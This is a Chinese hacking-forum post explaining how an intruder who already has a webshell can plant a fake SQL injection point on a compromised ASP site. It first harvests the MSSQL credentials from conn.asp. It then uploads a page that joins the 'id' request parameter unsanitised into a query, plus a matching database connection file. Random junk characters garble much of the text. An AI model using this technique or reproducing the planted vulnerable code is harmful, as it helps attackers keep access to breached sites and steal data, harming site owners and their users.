自己构造注入点方便入侵' F9 b' z0 ?& F E) q/ ~ W
2 Z+ W, H; m7 L9 s0 z2 B. v- ~) G今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息- K: W% ]$ A: h8 \2 [, K) {# R
8 V: ] m$ v& l M, E这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
* }1 _+ |2 h# _) S. p8 ]
" k( n' q, [9 z4 ~" O: z! U首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和; ]( N* X# x4 r$ a6 h- |" \3 W9 g
$ v" S" I. l3 a6 T' D6 T! I d密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
- u$ W4 D* T/ [. `, J- I2 N
3 f4 m9 P1 @/ w7 ~) w因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:9 J) T) e- C* w6 \; H
. _5 N; T# _/ p0 I程序代码
: p2 ?, G! U6 g0 P. E- o$ N" D<!--#include file="xx.asp"-->
8 b5 F: ?! I' x7 ]: W1 U' F<%' ]1 P0 c K$ [; ]
set rs=server.createobject("ADODB.recordset")
$ q1 ?1 e# `+ U6 g: A; wid = request("id")
# a. G. @: F, \: ]/ b$ S! ]strSQL = "select * from admin where id=" & id& R- c* p( Y) X+ z, t; ^$ C, ?
rs.open strSQL,conn,1,3
4 h3 c! [3 | P+ k; \, ?9 z- Jrs.close
3 g3 D% B& ^; ^ F! ~%>/ T4 s# K6 k5 B' M9 t5 ^% z7 e$ [
- Q7 \! e$ H# Q) s% o4 n/ p, F
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
. I& H! ~ m& |; }/ ^6 B/ ]. C1 A- n% M2 S0 J+ A
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
e( x* y* f1 E* v0 w/ T) W O
p: X" i, ]* @2 Q然后就要构造一个连接数据库的文件了,代码如下: I6 a/ D7 q8 M
程序代码+ W9 j# h) L8 t. v+ I- f
<%
) i8 v; Y* T _* KstrSQLServerName = "000.000.000.000" '服务器名称或地址3 O' U7 Y. r9 l$ X9 m
strSQLDBUserName = "sqlname" '数据库帐号; |: q7 G; y" W9 O- S
strSQLDBPassword = "sqlpass" '数据库密码
! t8 l9 W; a! f2 e: _ k4 B4 o' DstrSQLDBName = "sqldataname" '数据库名称
+ }. r# \: k$ ~. r) CSet conn = Server.CreateObject("ADODB.Connection")
( K0 j$ S1 f9 a1 K$ h; J6 YstrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"- s3 ?, s* J. h, g" p9 c* n$ H6 f7 M# K
conn.open strCon
5 p3 x7 b+ E& H%>' [% E" V+ p3 @3 A
8 B) q5 M! @ y* F, J, N6 d7 Y这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,# G/ ^' h r8 X* }, u# x
! I- P2 [3 E& m: m; v0 G就这样,正常情况下,就OK了,伪造成功……
6 R5 e. B! ^0 m! [& T3 n+ X: ]* _; H2 q
如果有什么问题可以提出来大家一起探讨解决。 |